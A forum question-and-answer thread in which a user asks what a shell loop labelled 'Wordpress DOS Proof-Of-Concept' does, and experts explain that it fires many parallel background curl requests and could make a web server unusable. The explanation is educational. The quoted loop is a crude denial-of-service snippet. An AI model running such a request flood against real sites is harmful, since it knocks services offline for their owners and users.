Help explain this unix command

Posted on 2011-05-01
Last Modified: 2012-05-11

Can someone please explain me about a line below:

Wordpress DOS Proof-Of-Concept :
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "http://localhost/s?=$random">  /dev/null 2>&1 &

Thank you
Question by:toyen
    LVL 68

    Expert Comment

    The statement creates an "array" of numbers starting at "1" up to the value stored in the variable "requests", using the "seq" utiity.

    A "for" loop uses these numbers one by one to store them in the variable "random" to then run a curl command using this variable, like

    curl -A Firefox -o --url "http://localhost/s?=1">  /dev/null 2>&1 &
    curl -A Firefox -o --url "http://localhost/s?=2">  /dev/null 2>&1 &
    curl -A Firefox -o --url "http://localhost/s?=3">  /dev/null 2>&1 &

    The outputs of these curl commands are dicarded by redirecting  standard output (stdout = "1") as well as  standard error (stderr = "2") to the null device.

    The "&" at the end is used to run the curl commands in background, so they will run in parallel.

    The whole construct is missing the important " done" statement at the end (did you forget to post line 4?), and the first line
    starting with "Wordpress ..." will produce an error, becaue "Wordpress" is not a shell command, afaik.


    Author Comment

    thanks for your respond woolmilkporc,

    can you let me know what the line 4 should be?

    also may i know if this is a command to find a vulnerable in wordpress? is is possible? i understand wordpress have a tough coding.
    Thanks very much
    LVL 68

    Accepted Solution

    for random in `seq 1 $requests`; do
    curl -A Firefox -o --url "http://localhost/s?=$random">  /dev/null 2>&1 &

    As for the curl command itself - the statement does nothing else than calling the URL http://localhost/ which is the default page of your local machine's webserver, passing it the parameter "s" set to 1,2,3,..., using Firefox as the user agent.

    Do you run a local Wordpress server? Otherwise I could not see which way this curl should be useable to test Wordpress - and even there were a local Wordpress server, you would only fetch what the server would give you when receiving s=1,2,3.... and I can't tell you whether this could be useful for finding vulnerabilities, sorry!

    By the way, "-o" normally designates an output file whose name seems to be missing here by mistake - correct form should be "-o /path/to/outputfile".
    LVL 6

    Expert Comment

    Sense it's running in the background, this MIGHT be an attempt to determine who many concurrent connections the App would support.

    As far as vulnerabilities, DOS (Denial Of Service), would be about all it could prove..
    this would explain the first line of the post.

    "Wordpress DOS Proof-Of-Concept :"   This should probably have a # in column 1 (comment)

    So, if you implement woolmilkporc's recommendations above, and set $requests to a high enough number, you may find that the webserver / app is unusable.

    Write Comment

    Please enter a first name

    Please enter a last name

    We will never share this with anyone.

    Featured Post

    Looking for New Ways to Advertise?

    Engage with tech pros in our community with native advertising, as a Vendor Expert, and more.

    The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
    Today, still in the boom of Apple, PC's and products, nearly 50% of the computer users use Windows as graphical operating systems. If you are among those users who love windows, but are grappling to keep the system's hard drive optimized, then you s…
    Learn how to get help with Linux/Unix bash shell commands. Use help to read help documents for built in bash shell commands.: Use man to interface with the online reference manuals for shell commands.: Use man to search man pages for unknown command…
    Video by: Phil
    This video goes over how to configure and start a jail in FreeBSD.  This video is meant to supplement the article included with this course.

    737 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    22 Experts available now in Live!

    Get 1:1 Help Now